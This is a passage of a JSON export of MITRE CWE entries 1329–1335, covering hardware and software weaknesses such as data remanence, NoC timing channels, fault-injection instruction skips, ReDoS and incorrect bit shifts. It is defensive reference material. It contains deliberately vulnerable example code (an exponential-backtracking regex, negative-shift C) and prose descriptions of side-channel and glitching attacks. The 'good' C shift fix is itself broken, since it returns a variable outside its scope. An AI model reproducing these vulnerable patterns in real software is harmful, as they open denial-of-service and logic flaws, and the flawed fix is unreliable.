this weakness, software systems can also be affected, such as when a third-party driver or library is no longer actively maintained or supported but is still critical for the required functionality."]},"Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"664","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}},"Operating_System":{"attr":{"@_Class":"OS-Independent","@_Prevalence":"Undetermined"}},"Architecture":{"attr":{"@_Class":"Architecture-Independent","@_Prevalence":"Undetermined"}},"Technology":{"attr":{"@_Class":"Technology-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Architecture and Design","Note":"Designers might omit capabilities for updating a component due to time pressures to release the product or assumptions about the stability of the component."}},"Common_Consequences":{"Consequence":{"Scope":"Other","Impact":["Quality Degradation","Reduce Maintainability"]}},"Potential_Mitigations":{"Mitigation":[{"Phase":"Requirements","Description":"Specify requirements that each component should be updateable."},{"Phase":"Architecture and Design","Description":"Design the product to allow for updating of its components. Consider the infrastructure that might be necessary to support updates."},{"Phase":"Implementation","Description":"Implement the necessary functionality to allow each component to be updated."}]},"Demonstrative_Examples":{"Demonstrative_Example":[{"attr":{"@_Demonstrative_Example_ID":"DX-145"},"Intro_Text":"A refrigerator has an Internet interface for the official purpose of alerting the manufacturer when that refrigerator detects a fault. Because the device is attached to the Internet, the refrigerator is a target for hackers who may wish to use the device other potentially more nefarious purposes.","Example_Code":[{"#text":"The refrigerator has no means of patching and is hacked becoming a spewer of email spam.","attr":{"@_Nature":"bad","@_Language":"Other"}},{"#text":"The device automatically patches itself and provides considerable more protection against being hacked.","attr":{"@_Nature":"good","@_Language":"Other"}}]},{"attr":{"@_Demonstrative_Example_ID":"DX-146"},"Intro_Text":{"xhtml:p":"A System-on-Chip (SOC) implements a Root-of-Trust (RoT) in ROM to boot secure code. However, at times this ROM code might have security vulnerabilities and need to be patched. Since ROM is immutable, it can be impossible to patch."},"Body_Text":"ROM does not have built-in application-programming interfaces (APIs) to patch if the code is vulnerable. Implement mechanisms to patch the vulnerable ROM code."}]},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-1197","@_Section":"Executive Summary"}}},"Notes":{"Note":{"#text":"This entry is still under development and will continue to see updates and content improvements.","attr":{"@_Type":"Maintenance"}}},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2020-12-03"},"Modification":{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-07-20","Modification_Comment":"updated Demonstrative_Examples, Description, References"}}},"1330":{"attr":{"@_ID":"1330","@_Name":"Remanent Data Readable after Memory Erase","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Draft"},"Description":"Confidential information stored in memory circuits is readable or recoverable after being cleared or erased.","Extended_Description":{"xhtml:p":["Data remanence occurs when stored, memory content is not fully lost after a memory-clear or -erase operation. Confidential memory contents can still be readable through data remanence in the hardware.","Data remanence can occur because of performance optimization or memory organization during \'clear\' or \'erase\' operations, like a design that allows the memory-organization metadata (e.g., file pointers) to be erased without erasing the actual memory content. To protect against this weakness, memory devices will often support different commands for optimized memory erase and explicit secure erase.","Data remanence can also happen because of the physical properties of memory circuits in use. For example, static, random-access-memory (SRAM) and dynamic, random-access-memory (DRAM) data retention is based on the charge retained in the memory cell, which depends on factors such as power supply, refresh rates, and temperature.","Other than explicit erase commands, self-encrypting, secure-memory devices can also support secure erase through cryptographic erase commands. In such designs, only the decryption keys for encrypted data stored on the device are erased. That is, the stored data are always remnant in the media after a cryptographic erase. However, only the encrypted data can be extracted. Thus, protection against data recovery in such designs relies on the strength of the encryption algorithm."]},"Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"1301","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"1301","@_View_ID":"1194","@_Ordinal":"Primary"}}]},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}},"Operating_System":{"attr":{"@_Class":"OS-Independent","@_Prevalence":"Undetermined"}},"Architecture":{"attr":{"@_Class":"Architecture-Independent","@_Prevalence":"Undetermined"}},"Technology":[{"attr":{"@_Name":"Security IP","@_Prevalence":"Undetermined"}},{"attr":{"@_Class":"Technology-Independent","@_Prevalence":"Undetermined"}}]},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation"}]},"Common_Consequences":{"Consequence":{"Scope":"Confidentiality","Impact":["Modify Memory","Read Memory"],"Note":"Confidential data are readable to untrusted agent."}},"Detection_Methods":{"Detection_Method":[{"Method":"Architecture or Design Review","Description":{"xhtml:ol":{"xhtml:li":["Testing of memory-device contents after clearing or erase commands.","Dynamic analysis of memory contents during device operation to detect specific, confidential assets.","Architecture and design analysis of memory clear and erase operations."]}}},{"Method":"Dynamic Analysis with Manual Results Interpretation","Description":{"xhtml:ol":{"xhtml:li":["Testing of memory-device contents after clearing or erase commands.","Dynamic analysis of memory contents during device operation to detect specific, confidential assets.","Architecture and design analysis of memory clear and erase operations."]}}}]},"Potential_Mitigations":{"Mitigation":{"Phase":"Architecture and Design","Description":{"xhtml:ol":{"xhtml:li":["Support for secure-erase commands that apply multiple cycles of overwriting memory with known patterns and of erasing actual content.","Support for cryptographic erase in self-encrypting, memory devices.","External, physical tools to erase memory such as ultraviolet-rays-based erase of Electrically erasable, programmable, read-only memory (EEPROM).","Physical destruction of media device. This is done for repurposed or scrapped devices that are no longer in use."]}}}},"Demonstrative_Examples":{"Demonstrative_Example":{"Intro_Text":"Consider a device that uses flash memory for non-volatile-data storage. To optimize flash-access performance or reliable-flash lifetime, the device might limit the number of flash writes/erases by maintaining some state in internal SRAM and only committing changes to flash memory periodically.","Body_Text":["The device also supports user reset to factory defaults with the expectation that all personal information is erased from the device after this operation. On factory reset, user files are erased using explicit, erase commands supported by the flash device.","In the given, system design, the flash-file system can support performance-optimized erase such that only the file metadata are erased and not the content. If this optimized erase is used for files containing user data during factory-reset flow, then device, flash memory can contain remanent data from these files.","On device-factory reset, the implementation might not erase these copies, since the file organization has changed and the flash file system does not have the metadata to track all previous copies.","A flash-memory region that is used by a flash-file system should be fully erased as part of the factory-reset flow. This should include secure-erase flow for the flash media such as overwriting patterns multiple times followed by erase."]}},"Observed_Examples":{"Observed_Example":{"Reference":"CVE-2019-8575","Description":"Firmware Data Deletion Vulnerability in which a base station factory reset might not delete all user information. The impact of this enables a new owner of a used device that has been \\"factory-default reset\\" with a vulnerable firmware version can still retrieve, at least, the previous owner\'s wireless network name, and the previous owner\'s wireless security (such as WPA2) key. This issue was addressed with improved, data deletion.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-8575"}},"Related_Attack_Patterns":{"Related_Attack_Pattern":[{"attr":{"@_CAPEC_ID":"150"}},{"attr":{"@_CAPEC_ID":"37"}},{"attr":{"@_CAPEC_ID":"545"}}]},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-1154"}}},"Content_History":{"Submission":{"Submission_Name":"Hareesh Khattri, Arun Kanuparthi, Parbati K. Manna","Submission_Organization":"Intel Corporation","Submission_Date":"2020-06-10"}}},"1331":{"attr":{"@_ID":"1331","@_Name":"Improper Isolation of Shared Resources in Network On Chip (NoC)","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Stable"},"Description":"The Network On Chip (NoC) does not isolate or incorrectly isolates its on-chip-fabric and internal resources such that they are shared between trusted and untrusted agents, creating timing channels.","Extended_Description":{"xhtml:p":"Typically, network on chips (NoC) have many internal resources that are shared between packets from different trust domains. These resources include internal buffers, crossbars and switches, individual ports, and channels. The sharing of resources causes contention and introduces interference between differently trusted domains, which poses a security threat via a timing channel, allowing attackers to infer data that belongs to a trusted agent. This may also result in introducing network interference, resulting in degraded throughput and latency."},"Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"653","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"668","@_View_ID":"1000"}},{"attr":{"@_Nature":"PeerOf","@_CWE_ID":"1189","@_View_ID":"1194"}}]},"Weakness_Ordinalities":{"Weakness_Ordinality":{"Ordinality":"Primary"}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}},"Operating_System":{"attr":{"@_Class":"OS-Independent","@_Prevalence":"Undetermined"}},"Architecture":{"attr":{"@_Class":"Architecture-Independent","@_Prevalence":"Undetermined"}},"Technology":[{"attr":{"@_Name":"Security IP","@_Prevalence":"Undetermined"}},{"attr":{"@_Class":"Technology-Independent","@_Prevalence":"Undetermined"}}]},"Background_Details":{"Background_Detail":{"xhtml:p":"\\"Network-on-chip\\" (NoC) is a commonly-used term used for hardware interconnect fabrics used by multicore Systems-on-Chip (SoC). Communication between modules on the chip uses packet-based methods, with improved efficiency and scalability compared to bus architectures [REF-1241]."}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation"}]},"Common_Consequences":{"Consequence":{"Scope":["Confidentiality","Availability"],"Impact":["DoS: Resource Consumption (Other)","Varies by Context","Other"],"Likelihood":"Medium","Note":"Attackers may infer data that belongs to a trusted agent; the methods used to perform this attack may result in noticeably increased resource consumption."}},"Detection_Methods":{"Detection_Method":{"Method":"Manual Analysis","Description":"Providing marker flags to send through the interfaces coupled with examination of which users are able to read or manipulate the flags will help verify that the proper isolation has been achieved and is effective.","Effectiveness":"Moderate"}},"Potential_Mitigations":{"Mitigation":{"Phase":["Architecture and Design","Implementation"],"Description":"Implement priority-based arbitration inside the NoC and have dedicated buffers or virtual channels for routing secret data from trusted agents."}},"Demonstrative_Examples":{"Demonstrative_Example":{"Intro_Text":"Consider a NoC that implements a one-dimensional mesh network with four nodes. This supports two flows: Flow A from node 0 to node 3 (via node 1 and node 2) and Flow B from node 1 to node 2. Flows A and B share a common link between Node 1 and Node 2. Only one flow can use the link in each cycle.","Body_Text":["One of the masters to this NoC implements a cryptographic algorithm (RSA), and another master to the NoC is a core that can be exercised by an attacker. The RSA algorithm performs a modulo multiplication of two large numbers and depends on each bit of the secret key. The algorithm examines each bit in the secret key and only performs multiplication if the bit is 1. This algorithm is known to be prone to timing attacks. Whenever RSA performs multiplication, there is additional network traffic to the memory controller. One of the reasons for this is cache conflicts.","Since this is a one-dimensional mesh, only one flow can use the link in each cycle. Also, packets from the attack program and the RSA program share the output port of the network-on-chip. This contention results in network interference, and the throughput and latency of one flow can be affected by the other flow\'s demand.","There may be different ways to fix this particular weakness."],"Example_Code":[{"#text":"The attacker runs a loop program on the core they control, and this causes a cache miss in every iteration for the RSA algorithm. Thus, by observing network-traffic bandwidth and timing, the attack program can determine when the RSA algorithm is doing a multiply operation (i.e., when the secret key bit is 1) and eventually extract the entire, secret key.","attr":{"@_Nature":"attack"}},{"#text":"Implement priority-based arbitration inside the NoC and have dedicated buffers or virtual channels for routing secret data from trusted agents.","attr":{"@_Nature":"good","@_Language":"Other"}}]}},"Related_Attack_Patterns":{"Related_Attack_Pattern":{"attr":{"@_CAPEC_ID":"124"}}},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-1155"}},{"attr":{"@_External_Reference_ID":"REF-1241"}},{"attr":{"@_External_Reference_ID":"REF-1242"}}]},"Content_History":{"Submission":{"Submission_Name":"Arun Kanuparthi, Hareesh Khattri, Parbati K. Manna","Submission_Organization":"Intel Corporation","Submission_Date":"2020-05-23"},"Contribution":{"attr":{"@_Type":"Content"},"Contribution_Name":"Hareesh Khattri","Contribution_Organization":"Intel Corporation","Contribution_Date":"2021-10-22","Contribution_Comment":"provided references and background information"}}},"1332":{"attr":{"@_ID":"1332","@_Name":"Improper Handling of Faults that Lead to Instruction Skips","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Stable"},"Description":"The device is missing or incorrectly implements circuitry or sensors that detect and mitigate the skipping of security-critical CPU instructions when they occur.","Extended_Description":{"xhtml:p":["The operating conditions of hardware may change\\n in ways that cause unexpected behavior to occur,\\n including the skipping of security-critical CPU\\n instructions. Generally, this can occur due to\\n electrical disturbances or when the device operates\\n outside of its expected conditions.","In practice, application code may contain\\n\\t\\t\\t conditional branches that are security-sensitive (e.g.,\\n\\t\\t\\t accepting or rejecting a user-provided password). These\\n\\t\\t\\t conditional branches are typically implemented by a\\n\\t\\t\\t single conditional branch instruction in the program\\n\\t\\t\\t binary which, if skipped, may lead to effectively\\n\\t\\t\\t flipping the branch condition - i.e., causing the wrong\\n\\t\\t\\t security-sensitive branch to be taken. This affects\\n\\t\\t\\t processes such as firmware authentication, password\\n\\t\\t\\t verification, and other security-sensitive decision\\n\\t\\t\\t points.","Attackers can use fault injection techniques to\\n\\t\\t\\t alter the operating conditions of hardware so that\\n\\t\\t\\t security-critical instructions are skipped more\\n\\t\\t\\t frequently or more reliably than they would in a\\n\\t\\t\\t \\"natural\\" setting."]},"Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"PeerOf","@_CWE_ID":"1247","@_View_ID":"1194","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"703","@_View_ID":"1000"}}]},"Weakness_Ordinalities":{"Weakness_Ordinality":{"Ordinality":"Primary"}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}},"Operating_System":{"attr":{"@_Class":"OS-Independent","@_Prevalence":"Undetermined"}},"Architecture":{"attr":{"@_Class":"Architecture-Independent","@_Prevalence":"Undetermined"}},"Technology":{"attr":{"@_Class":"System on Chip","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design","Note":"Failure to design appropriate countermeasures to common fault injection techniques can manifest this weakness."},{"Phase":"Implementation","Note":"This weakness can arise if the hardware design incorrectly implements countermeasures to prevent fault injection."}]},"Common_Consequences":{"Consequence":{"Scope":["Confidentiality","Integrity","Authentication"],"Impact":["Bypass Protection Mechanism","Alter Execution Logic","Unexpected State"],"Likelihood":"High","Note":"Depending on the context, instruction skipping can\\n have a broad range of consequences related to the\\n generic bypassing of security critical code."}},"Detection_Methods":{"Detection_Method":[{"Method":"Automated Static Analysis","Description":"This weakness can be found using automated static analysis once a developer has indicated which code paths are critical to protect.","Effectiveness":"Moderate"},{"Method":"Simulation / Emulation","Description":"This weakness can be found using automated dynamic analysis. Both emulation of a CPU with instruction skips, as well as RTL simulation of a CPU IP, can indicate parts of the code that are sensitive to faults due to instruction skips.","Effectiveness":"Moderate"},{"Method":"Manual Analysis","Description":"This weakness can be found using manual (static) analysis. The analyst has security objectives that are matched against the high-level code. This method is less precise than emulation, especially if the analysis is done at the higher level language rather than at assembly level.","Effectiveness":"Moderate"}]},"Potential_Mitigations":{"Mitigation":[{"Phase":"Architecture and Design","Description":"Design strategies for ensuring safe failure if inputs such as Vcc are modified out of acceptable ranges."},{"Phase":"Architecture and Design","Description":"Design strategies for ensuring safe behavior if instructions attempt to be skipped."},{"Phase":"Implementation","Description":"Ensure that architected fault mitigations are\\n strong enough in practice. For example, a low power\\n detection mechanism that takes 50 clock cycles to\\n trigger at lower voltages may be an insufficient security mechanism if the instruction counter\\n has already progressed with no other CPU activity occurring."}]},"Demonstrative_Examples":{"Demonstrative_Example":{"Intro_Text":"A smart card contains authentication credentials that are used as authorization to enter a building. The credentials are only accessible when a correct PIN is presented to the card.","Example_Code":[{"#text":"The card emits the credentials when a voltage anomaly is injected into the power line to the device at a particular time after providing an incorrect PIN to the card, causing the internal program to accept the incorrect PIN.","attr":{"@_Nature":"bad"}},{"attr":{"@_Nature":"good"},"xhtml:ul":{"xhtml:li":["add an internal filter or internal power supply in series with the power supply pin on the device","add sensing circuitry to reset the device if out of tolerance conditions are detected","add additional execution sensing circuits to monitor the execution order for anomalies and abort the action or reset the device under fault conditions"]}}],"Body_Text":"There are several ways this weakness could be fixed."}},"Observed_Examples":{"Observed_Example":{"Reference":"CVE-2019-15894","Description":"fault injection attack bypasses the verification mode, potentially allowing arbitrary code execution.","Link":"http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-15894"}},"Functional_Areas":{"Functional_Area":"Power"},"Related_Attack_Patterns":{"Related_Attack_Pattern":{"attr":{"@_CAPEC_ID":"624"}}},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-1160"}},{"attr":{"@_External_Reference_ID":"REF-1161"}},{"attr":{"@_External_Reference_ID":"REF-1222"}},{"attr":{"@_External_Reference_ID":"REF-1223"}},{"attr":{"@_External_Reference_ID":"REF-1224"}}]},"Content_History":{"Submission":{"Submission_Name":"Jasper van Woudenberg","Submission_Organization":"Riscure","Submission_Date":"2020-10-14"},"Modification":[{"Modification_Name":"Jasper van Woudenberg","Modification_Organization":"Riscure","Modification_Date":"2021-01-11"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-03-15","Modification_Comment":"updated Description, Functional_Areas, Potential_Mitigations, References"}],"Contribution":{"attr":{"@_Type":"Content"},"Contribution_Name":"Jasper van Woudenberg","Contribution_Organization":"Riscure","Contribution_Date":"2021-10-11","Contribution_Comment":"Provided detection methods and feedback on demonstrative example"}}},"1333":{"attr":{"@_ID":"1333","@_Name":"Inefficient Regular Expression Complexity","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Draft"},"Description":"The product uses a regular expression with an inefficient, possibly exponential worst-case computational complexity that consumes excessive CPU cycles.","Extended_Description":{"#text":"Some regular expression engines have a feature called \\"backtracking\\". If the token cannot match, the engine \\"backtracks\\" to a position that may result in a different token that can match.Backtracking becomes a weakness if all of these conditions are met:","xhtml:br":["",""],"xhtml:ul":{"xhtml:li":["The number of possible backtracking attempts are exponential relative to the length of the input.","The input can fail to match the regular expression.","The input can be long enough."]},"xhtml:p":"Attackers can create crafted inputs that\\n\\t\\t intentionally cause the regular expression to use\\n\\t\\t excessive backtracking in a way that causes the CPU\\n\\t\\t consumption to spike."},"Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"407","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"185","@_View_ID":"1000"}}]},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Alternate_Terms":{"Alternate_Term":[{"Term":"ReDoS","Description":"ReDoS is an abbreviation of \\"Regular expression Denial of Service\\"."},{"Term":"Regular Expression Denial of Service","Description":"While this term is attack-focused, this is commonly used to describe the weakness."},{"Term":"Catastrophic backtracking","Description":"This term is used to describe the behavior of the regular expression as a negative technical impact."}]},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation","Note":"A RegEx can be easy to create and read using unbounded matching characters, but the programmer might not consider the risk of excessive backtracking."}},"Likelihood_Of_Exploit":"High","Common_Consequences":{"Consequence":{"Scope":"Availability","Impact":"DoS: Resource Consumption (CPU)","Likelihood":"High"}},"Potential_Mitigations":{"Mitigation":[{"Phase":"Architecture and Design","Description":"Use regular expressions that do not support backtracking, e.g. by removing nested quantifiers.","Effectiveness":"High","Effectiveness_Notes":"This is one of the few effective solutions when using user-provided regular expressions."},{"Phase":"System Configuration","Description":"Configure backtracking limits in the configuration of the regular expression implementation, such as PHP\'s pcre.backtrack_limit. Also consider limits on execution time for the process.","Effectiveness":"Moderate"},{"Phase":"Implementation","Description":"Do not use regular expressions with untrusted input. If regular expressions must be used, avoid using backtracking in the expression.","Effectiveness":"High"},{"Phase":"Implementation","Description":"Limit the length of the input that the regular expression will process.","Effectiveness":"Moderate"}]},"Demonstrative_Examples":{"Demonstrative_Example":[{"Intro_Text":"This example attempts to check if an input string is a \\"sentence\\" [REF-1164].","Example_Code":[{"#text":"var test_string = \\"Bad characters: $@#\\";var bad_pattern = /^(\\\\w+\\\\s?)*$/i;var result = test_string.search(bad_pattern);","attr":{"@_Nature":"bad","@_Language":"JavaScript"},"xhtml:br":["",""]},{"#text":"var test_string = \\"Bad characters: $@#\\";var good_pattern = /^((?=(\\\\w+))\\\\2\\\\s?)*$/i;var result = test_string.search(good_pattern);","attr":{"@_Nature":"good","@_Language":"JavaScript"},"xhtml:br":["",""]}],"Body_Text":[{"xhtml:p":["The regular expression has a vulnerable backtracking clause inside (\\\\w+\\\\s?)*$ which can be triggered to cause a Denial of Service by processing particular phrases.","To fix the backtracking problem, backtracking is removed with the ?= portion of the expression which changes it to a lookahead and the \\\\2 which prevents the backtracking. The modified example is:"]},"Note that [REF-1164] has a more thorough (and lengthy) explanation of everything going on within the RegEx."]},{"Intro_Text":"This example attempts to check if an input string is a \\"sentence\\" and is modified for Perl [REF-1164].","Example_Code":[{"#text":"my $test_string = \\"Bad characters: \\\\$\\\\@\\\\#\\";my $bdrslt = $test_string;$bdrslt =~ /^(\\\\w+\\\\s?)*$/i;","attr":{"@_Nature":"bad","@_Language":"Perl"},"xhtml:br":["",""]},{"#text":"my $test_string = \\"Bad characters: \\\\$\\\\@\\\\#\\";my $gdrslt = $test_string;$gdrslt =~ /^((?=(\\\\w+))\\\\2\\\\s?)*$/i;","attr":{"@_Nature":"good","@_Language":"Perl"},"xhtml:br":["",""]}],"Body_Text":[{"xhtml:p":["The regular expression has a vulnerable backtracking clause inside (\\\\w+\\\\s?)*$ which can be triggered to cause a Denial of Service by processing particular phrases.","To fix the backtracking problem, backtracking is removed with the ?= portion of the expression which changes it to a lookahead and the \\\\2 which prevents the backtracking. The modified example is:"]},"Note that [REF-1164] has a more thorough (and lengthy) explanation of everything going on within the RegEx."]}]},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2019-16215","Description":"Markdown parser uses inefficient regex when processing a message, allowing users to cause CPU consumption and delay preventing processing of other messages.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16215"},{"Reference":"CVE-2019-6785","Description":"Long string in a version control product allows DoS due to an inefficient regex.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-6785"},{"Reference":"CVE-2019-12041","Description":"Javascript code allows ReDoS via a long string due to excessive backtracking.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12041"},{"Reference":"CVE-2015-8315","Description":"ReDoS when parsing time.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-8315"},{"Reference":"CVE-2015-8854","Description":"ReDoS when parsing documents.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-8854"},{"Reference":"CVE-2017-16021","Description":"ReDoS when validating URL.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-16021"}]},"Related_Attack_Patterns":{"Related_Attack_Pattern":{"attr":{"@_CAPEC_ID":"492"}}},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-1180"}},{"attr":{"@_External_Reference_ID":"REF-1162"}},{"attr":{"@_External_Reference_ID":"REF-1163"}},{"attr":{"@_External_Reference_ID":"REF-1164"}},{"attr":{"@_External_Reference_ID":"REF-1165"}},{"attr":{"@_External_Reference_ID":"REF-1166"}},{"attr":{"@_External_Reference_ID":"REF-1167"}}]},"Content_History":{"Submission":{"Submission_Name":"Anonymous External Contributor","Submission_Date":"2021-01-17"},"Modification":{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-07-20","Modification_Comment":"updated References"}}},"1334":{"attr":{"@_ID":"1334","@_Name":"Unauthorized Error Injection Can Degrade Hardware Redundancy","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Draft"},"Description":"An unauthorized agent can inject errors into a redundant block to deprive the system of redundancy or put the system in a degraded operating mode.","Extended_Description":{"xhtml:p":"To ensure the performance and functional reliability of certain components, hardware designers can implement hardware blocks for redundancy in the case that others fail. This redundant block can be prevented from performing as intended if the design allows unauthorized agents to inject errors into it. In this way, a path with injected errors may become unavailable to serve as a redundant channel. This may put the system into a degraded mode of operation which could be exploited by a subsequent attack."},"Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"284","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}},"Operating_System":{"attr":{"@_Class":"OS-Independent","@_Prevalence":"Undetermined"}},"Architecture":{"attr":{"@_Class":"Architecture-Independent","@_Prevalence":"Undetermined"}},"Technology":{"attr":{"@_Class":"Technology-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design","Note":"Such issues could be introduced during hardware architecture and design and identified later during Testing or System Configuration phases."},{"Phase":"Implementation","Note":"Such issues could be introduced during implementation and identified later during Testing or System Configuration phases."},{"Phase":"Integration","Note":"Such issues could be introduced during integration and identified later during Testing or System Configuration phases."}]},"Common_Consequences":{"Consequence":{"Scope":["Integrity","Availability"],"Impact":["DoS: Crash, Exit, or Restart","DoS: Instability","Quality Degradation","DoS: Resource Consumption (CPU)","DoS: Resource Consumption (Memory)","DoS: Resource Consumption (Other)","Reduce Performance","Reduce Reliability","Unexpected State"]}},"Potential_Mitigations":{"Mitigation":[{"Phase":"Architecture and Design","Description":"Ensure the design does not allow error injection in modes intended for normal run-time operation. Provide access controls on interfaces for injecting errors."},{"Phase":"Implementation","Description":"Disallow error injection in modes which are expected to be used for normal run-time operation. Provide access controls on interfaces for injecting errors."},{"Phase":"Integration","Description":"Add an access control layer atop any unprotected interfaces for injecting errors."}]},"Related_Attack_Patterns":{"Related_Attack_Pattern":{"attr":{"@_CAPEC_ID":"624"}}},"Content_History":{"Submission":{"Submission_Name":"James Pangburn","Submission_Organization":"Accellera IP Security Assurance (IPSA) Working Group","Submission_Date":"2020-07-29"}}},"1335":{"attr":{"@_ID":"1335","@_Name":"Incorrect Bitwise Shift of Integer","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Draft"},"Description":"An integer value is specified to be shifted by a negative amount or an amount greater than or equal to the number of bits contained in the value causing an unexpected or indeterminate result.","Extended_Description":{"xhtml:p":["Specifying a value to be shifted by a negative amount is undefined in various languages. Various computer architectures implement this action in different ways. The compilers and interpreters when generating code to accomplish a shift generally do not do a check for this issue.","Specifying an over-shift, a shift greater than or equal to the number of bits contained in a value to be shifted, produces a result which varies by architecture and compiler. In some languages, this action is specifically listed as producing an undefined result."]},"Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"682","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":[{"attr":{"@_Name":"C","@_Prevalence":"Undetermined"}},{"attr":{"@_Name":"C++","@_Prevalence":"Undetermined"}},{"attr":{"@_Name":"C#","@_Prevalence":"Undetermined"}},{"attr":{"@_Name":"Java","@_Prevalence":"Undetermined"}},{"attr":{"@_Name":"JavaScript","@_Prevalence":"Undetermined"}}],"Operating_System":{"attr":{"@_Class":"OS-Independent","@_Prevalence":"Undetermined"}},"Technology":{"attr":{"@_Class":"Technology-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation","Note":"Adding shifts without properly verifying the size and sign of the shift amount."}},"Common_Consequences":{"Consequence":{"Scope":"Integrity","Impact":"DoS: Crash, Exit, or Restart"}},"Potential_Mitigations":{"Mitigation":{"Phase":"Implementation","Description":"Implicitly or explicitly add checks and mitigation for negative or over-shift values."}},"Demonstrative_Examples":{"Demonstrative_Example":{"Intro_Text":"A negative shift amount for an x86 or x86_64 shift instruction will produce the number of bits to be shifted by taking a 2\'s-complement of the shift amount and effectively masking that amount to the lowest 6 bits for a 64 bit shift instruction.","Example_Code":[{"#text":"unsigned int r = 1 << -5;","attr":{"@_Nature":"bad","@_Language":"C"}},{"#text":"int choose_bit(int reg_bit, int bit_number_from_elsewhere){if (NEED_TO_SHIFT){reg_bit -= bit_number_from_elsewhere;}return reg_bit;}unsigned int handle_io_register(unsigned int *r){unsigned int the_bit = 1 << choose_bit(5, 10);*r |= the_bit;return the_bit;}","attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:br":["","","","","","","","","","","","","",""]},{"#text":"int choose_bit(int reg_bit, int bit_number_from_elsewhere){if (NEED_TO_SHIFT){reg_bit -= bit_number_from_elsewhere;}return reg_bit;}unsigned int handle_io_register(unsigned int *r){int the_bit_number = choose_bit(5, 10);if ((the_bit_number > 0) && (the_bit_number < 63)){unsigned int the_bit = 1 << the_bit_number;*r |= the_bit;}return the_bit;}","attr":{"@_Nature":"good","@_Language":"C"},"xhtml:br":["","","","","","","","","","","","","","","","","",""]}],"Body_Text":["The example above ends up with a shift amount of -5. The hexadecimal value is FFFFFFFFFFFFFFFD which, when bits above the 6th bit are masked off, the shift amount becomes a binary shift value of 111101 which is 61 decimal. A shift of 61 produces a very different result than -5. The previous example is a very simple version of the following code which is probably more realistic of what happens in a real system.","Note that the good example not only checks for negative shifts and disallows them but also for over-shifts. Not bit operation is done if the shift is out of bounds. Depending on the program, perhaps an error message should be logged."]}},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2009-4307","Description":"An unexpected large value in the ext4 filesystem causes an overshift condition resulting in a divide by zero.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-4307"},{"Reference":"CVE-2012-2100","Description":"An unexpected large value in the ext4 filesystem causes an overshift condition resulting in a divide by zero - fix of CVE-2009-4307.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-2100"},{"Reference":"CVE-2020-8835","Description":"An overshift in a kernel a allowed out of bounds reads and writes resulting in a 